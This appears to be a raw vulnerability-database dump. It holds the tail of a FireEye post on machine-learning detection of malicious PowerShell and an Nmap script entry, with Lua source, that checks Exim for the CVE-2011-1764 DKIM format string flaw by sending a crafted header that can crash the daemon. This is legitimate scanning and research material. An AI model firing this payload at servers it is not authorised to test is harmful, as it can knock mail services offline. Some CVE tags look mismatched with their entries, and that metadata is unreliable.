attacks, including:\n\n * Commodity malware such as Kovter.\n * Red team penetration test activities.\n * New variants that bypassed legacy signatures, while detected by our machine learning with high probabilistic confidence.\n\nThe unique values brought by the PowerShell machine learning detection engine include: \n\n * The machine learning model automatically learns the malicious patterns from the curated corpus. In contrast to traditional detection signature rule engines, which are Boolean expression and regex based, the NLP model has lower operation cost and significantly cuts down the release time of security content.\n * The model performs probabilistic inference on unknown PowerShell commands by the implicitly learned non-linear combinations of certain patterns, which increases the cost for the adversaries to bypass.\n\nThe ultimate value of this innovation is to evolve with the broader threat landscape, and to create a competitive edge over adversaries.\n\n#### Acknowledgements\n\nWe would like to acknowledge:\n\n * Daniel Bohannon, Christopher Glyer and Nick Carr for the support on threat research.\n * Alex Rivlin, HeeJong Lee, and Benjamin Chang from FireEye Labs for providing the DTI statistics.\n * Research endpoint support from Caleb Madrigal.\n * The FireEye ICE-DS Team.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-07-10T12:00:00", "type": "fireeye", "title": "Malicious PowerShell Detection via Machine Learning", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10271"], "modified": "2018-07-10T12:00:00", "id": "FIREEYE:6B4CFD4290F6444DFC070D828CEC509A", "href": "https://www.fireeye.com/blog/threat-research/2018/07/malicious-powershell-detection-via-machine-learning.html", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "nmap": [{"lastseen": "2022-02-15T09:34:39", "description": "Checks for a format string vulnerability in the Exim SMTP server (version 4.70 through 4.75) with DomainKeys Identified Mail (DKIM) support (CVE-2011-1764). The DKIM logging mechanism did not use format string specifiers when logging some parts of the DKIM-Signature header field. A remote attacker who is able to send emails, can exploit this vulnerability and execute arbitrary code with the privileges of the Exim daemon. \n\nReference: \n\n * <http://bugs.exim.org/show_bug.cgi?id=1106>\n * <http://thread.gmane.org/gmane.mail.exim.devel/4946>\n * <https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1764>\n * <http://en.wikipedia.org/wiki/DomainKeys_Identified_Mail>\n\n## Script Arguments \n\n#### smtp-vuln-cve2011-1764.mailto \n\nDefine the destination email address to be used.\n\n#### smtp-vuln-cve2011-1764.mailfrom \n\nDefine the source email address to be used.\n\n#### smtp.domain \n\nSee the documentation for the [smtp](<../lib/smtp.html#script-args>) library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the [smbauth](<../lib/smbauth.html#script-args>) library. \n\n#### vulns.short, vulns.showall \n\nSee the documentation for the [vulns](<../lib/vulns.html#script-args>) library. \n\n## Example Usage \n \n \n nmap --script=smtp-vuln-cve2011-1764 -pT:25,465,587 <host>\n \n\n## Script Output \n \n \n PORT STATE SERVICE\n 25/tcp open smtp\n | smtp-vuln-cve2011-1764:\n | VULNERABLE:\n | Exim DKIM format string\n | State: VULNERABLE\n | IDs: CVE:CVE-2011-1764 BID:47736\n | Risk factor: High CVSSv2: 7.5 (HIGH) (AV:N/AC:L/Au:N/C:P/I:P/A:P)\n | Description:\n | Exim SMTP server (version 4.70 through 4.75) with DomainKeys Identified\n | Mail (DKIM) support is vulnerable to a format string. A remote attacker\n | who is able to send emails, can exploit this vulnerability and execute\n | arbitrary code with the privileges of the Exim daemon.\n | Disclosure date: 2011-04-29\n | References:\n | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1764\n | https://www.securityfocus.com/bid/47736\n |_ http://bugs.exim.org/show_bug.cgi?id=1106\n \n\n## Requires \n\n * [shortport](<../lib/shortport.html>)\n * [smtp](<../lib/smtp.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [string](<>)\n * [table](<>)\n * [vulns](<../lib/vulns.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2011-07-18T10:21:01", "type": "nmap", "title": "smtp-vuln-cve2011-1764 NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-1764", "CVE-2012-1182", "CVE-2017-7494"], "modified": "2019-04-02T16:51:36", "id": "NMAP:SMTP-VULN-CVE2011-1764.NSE", "href": "https://nmap.org/nsedoc/scripts/smtp-vuln-cve2011-1764.html", "sourceData": "local shortport = require \"shortport\"\nlocal smtp = require \"smtp\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal table = require \"table\"\nlocal vulns = require \"vulns\"\n\ndescription = [[\nChecks for a format string vulnerability in the Exim SMTP server\n(version 4.70 through 4.75) with DomainKeys Identified Mail (DKIM) support\n(CVE-2011-1764). The DKIM logging mechanism did not use format string\nspecifiers when logging some parts of the DKIM-Signature header field.\nA remote attacker who is able to send emails, can exploit this vulnerability\nand execute arbitrary code with the privileges of the Exim daemon.\n\nReference:\n* http://bugs.exim.org/show_bug.cgi?id=1106\n* http://thread.gmane.org/gmane.mail.exim.devel/4946\n* https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1764\n* http://en.wikipedia.org/wiki/DomainKeys_Identified_Mail\n]]\n\n---\n-- @usage\n-- nmap --script=smtp-vuln-cve2011-1764 -pT:25,465,587 <host>\n--\n-- @output\n-- PORT STATE SERVICE\n-- 25/tcp open smtp\n-- | smtp-vuln-cve2011-1764:\n-- | VULNERABLE:\n-- | Exim DKIM format string\n-- | State: VULNERABLE\n-- | IDs: CVE:CVE-2011-1764 BID:47736\n-- | Risk factor: High CVSSv2: 7.5 (HIGH) (AV:N/AC:L/Au:N/C:P/I:P/A:P)\n-- | Description:\n-- | Exim SMTP server (version 4.70 through 4.75) with DomainKeys Identified\n-- | Mail (DKIM) support is vulnerable to a format string. A remote attacker\n-- | who is able to send emails, can exploit this vulnerability and execute\n-- | arbitrary code with the privileges of the Exim daemon.\n-- | Disclosure date: 2011-04-29\n-- | References:\n-- | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1764\n-- | https://www.securityfocus.com/bid/47736\n-- |_ http://bugs.exim.org/show_bug.cgi?id=1106\n--\n-- @args smtp-vuln-cve2011-1764.mailfrom Define the source email address to\n-- be used.\n-- @args smtp-vuln-cve2011-1764.mailto Define the destination email address\n-- to be used.\n\nauthor = \"Djalal Harouni\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"intrusive\", \"vuln\"}\n\n\nportrule = function (host, port)\n if port.version.product ~= nil and port.version.product ~= \"Exim smtpd\" then\n return false\n end\n return shortport.port_or_service({25, 465, 587},\n {\"smtp\", \"smtps\", \"submission\"})(host, port)\nend\n\nlocal function smtp_finish(socket, status, msg)\n if socket then\n socket:close()\n end\n return status, msg\nend\n\nlocal function get_exim_banner(response)\n local banner, version\n banner = response:match(\"%d+%s(.+)\")\n if banner and banner:match(\"Exim\") then\n version = tonumber(banner:match(\"Exim%s([0-9%.]+)\"))\n end\n return banner, version\nend\n\n-- Sends the mail with the evil DKIM-Signatures header.\n-- Returns true, true if the Exim server is vulnerable\nlocal function check_dkim(socket, smtp_opts)\n local killed = false\n\n stdnse.debug2(\"checking the Exim DKIM Format String\")\n\n local status, response = smtp.mail(socket, smtp_opts.mailfrom)\n if not status then\n return status, response\n end\n\n status, response = smtp.recipient(socket, smtp_opts.mailto)\n if not status then\n return status, response\n end\n\n status, response = smtp.datasend(socket)\n if not status then\n return status, response\n end\n\n local message = (\n string.format( \"MIME-Version: 1.0\\r\\nFrom: <%s>\\r\\nTo: <%s>\\r\\n\",\n smtp_opts.mailfrom, smtp_opts.mailto)\n ..\"Subject: Nmap Exim DKIM Format String check\\r\\n\"\n -- use a fake DKIM-Signature header.\n ..\"DKIM-Signature: v=1; a=%s%s%s%s;\"\n ..\" c=%s%s%s%s; q=dns/txt;\\r\\n\"\n ..\" d=%s%s%s%s; s=%s%s%s%s;\\r\\n\"\n ..\" h=mime-version:from:to:subject;\\r\\n\"\n ..\" bh=MTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTI=;\\r\\n\"\n ..\" b=DyE0uKynaea3Y66zkrnMaBqtYPYVXhazCKGBiZKMNywclgbj0MkREPH3t2EWByev9g=\\r\\n\"\n )\n status, response = socket:send(message)\n if not status then\n return status, \"failed to send the message.\"\n end\n\n status, response = smtp.query(socket, \".\")\n if not status then\n if string.match(response, \"connection closed\") then\n stdnse.debug2(\"Exim server is vulnerable to DKIM Format String\")\n killed = true\n else\n return status, \"failed to terminate the message, seems NOT VULNERABLE\"\n end\n end\n\n return true, killed\nend\n\n-- Checks if the Exim server is vulnerable to CVE-2011-1764\nlocal function check_exim(smtp_opts)\n local smtp_server = {}\n local exim_ver_min, exim_ver_max = 4.70, 4.75\n\n local socket, ret = smtp.connect(smtp_opts.host,\n smtp_opts.port,\n {ssl = true,\n timeout = 10000,\n recv_before = true,\n lines = 1})\n\n if not socket then\n return smtp_finish(nil, socket, ret)\n end\n\n smtp_server.banner, smtp_server.version = get_exim_banner(ret)\n if not smtp_server.banner then\n return smtp_finish(socket, false,\n 'failed to read the SMTP banner.')\n elseif not smtp_server.banner:match(\"Exim\") then\n return smtp_finish(socket, false,\n 'not a Exim server: NOT VULNERABLE')\n end\n\n local vuln = smtp_opts.vuln\n vuln.extra_info = {}\n if smtp_server.version then\n if smtp_server.version <= exim_ver_max and\n smtp_server.version >= exim_ver_min then\n vuln.state = vulns.STATE.LIKELY_VULN\n table.insert(vuln.extra_info,\n string.format(\"Exim version: %.02f\", smtp_server.version))\n else\n vuln.state = vulns.STATE.NOT_VULN\n return smtp_finish(socket, true)\n end\n end\n\n local status, response = smtp.ehlo(socket, smtp_opts.domain)\n if not status then\n return smtp_finish(socket, status, response)\n end\n\n -- set the appropriate 'MAIL FROM' and 'RCPT TO' values\n if not smtp_opts.mailfrom then\n smtp_opts.mailfrom = string.format(\"root@%s\", smtp_opts.domain)\n end\n if not smtp_opts.mailto then\n smtp_opts.mailto = string.format(\"postmaster@%s\",\n smtp_opts.host.targetname and\n smtp_opts.host.targetname or 'localhost')\n end\n\n status, ret = check_dkim(socket, smtp_opts)\n if not status then\n return smtp_finish(socket, status, ret)\n elseif ret then\n vuln.state = vulns.STATE.VULN\n elseif not vuln.state then\n vuln.state = vulns.STATE.NOT_VULN\n end\n\n return smtp_finish(socket, true)\nend\n\naction = function(host, port)\n local smtp_opts = {\n host = host,\n port = port,\n domain = stdnse.get_script_args('smtp.domain') or\n 'nmap.scanme.org',\n mailfrom = stdnse.get_script_args('smtp-vuln-cve2011-1764.mailfrom'),\n mailto = stdnse.get_script_args('smtp-vuln-cve2011-1764.mailto'),\n vuln = {\n title = 'Exim DKIM format string',\n IDS = {CVE = 'CVE-2011-1764', BID = '47736'},\n risk_factor = \"High\",\n scores = {\n CVSSv2 = \"7.5 (HIGH) (AV:N/AC:L/Au:N/C:P/I:P/A:P)\",\n },\n description = [[\nExim SMTP server (version 4.70 through 4.75) with DomainKeys Identified\nMail (DKIM) support is vulnerable to a format string. A remote attacker\nwho is able to send emai
Jok3R - Network And Web Pentest Framework
